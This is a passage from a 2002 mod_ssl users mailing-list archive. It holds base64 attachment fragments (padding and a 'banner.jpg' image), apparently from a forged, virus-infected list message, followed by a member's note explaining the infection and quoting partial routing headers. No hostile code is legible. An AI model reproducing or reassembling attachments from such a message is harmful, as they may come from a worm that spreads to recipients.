AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8=

--J4JcQNsg0277gz

Content-Type: application/octet-stream;
	name=banner.jpg
Content-Transfer-Encoding: base64
Content-ID: 

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
nfjy3YzRRQEmiiigP//Z
--J4JcQNsg0277gz--


------------=_1019156118-33395-0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 19 03:47:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA09648; Fri, 19 Apr 2002 03:46:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from rock.tumko.org id DAA09584; Fri, 19 Apr 2002 03:45:34 +0200 (MET DST)
Received: from rock.tumko.org (rock.tumko.org [127.0.0.1])
	by rock.tumko.org (8.12.3/8.12.3) with ESMTP id g3J1jWZH023360
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO)
	for ; Thu, 18 Apr 2002 18:45:32 -0700
Received: (from ded_subs@localhost)
	by rock.tumko.org (8.12.3/8.12.3/Submit) id g3J1jWGm023359
	for modssl-users@modssl.org; Thu, 18 Apr 2002 18:45:32 -0700
Date: Thu, 18 Apr 2002 18:45:32 -0700
From: Alex 
To: modssl-users 
Subject: Re: A very  humour game
Message-ID: <20020418184532.A23356@tumko.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Well, sorry for that... Somebody sent an infected email with
"From: modssl-users "..
Here are full headers:

Received: (qmail 33194 invoked from network); 18 Apr 2002 18:54:44 -0000
Received: from 200-207-45-98.dsl.telesp.net.br (HELO linux1.ecpcontabil.com.br)
(200.207.45.98)
  by daedalus.apache.org with SMTP; 18 Apr 2002 18:54:44 -0000
Received: (from root@localhost)
        by linux1.ecpcontabil.com.br (8.11.1/8.11.1) id g3IImAG01259
        for ; Thu, 18 Apr 2002 15:48:10 -0300
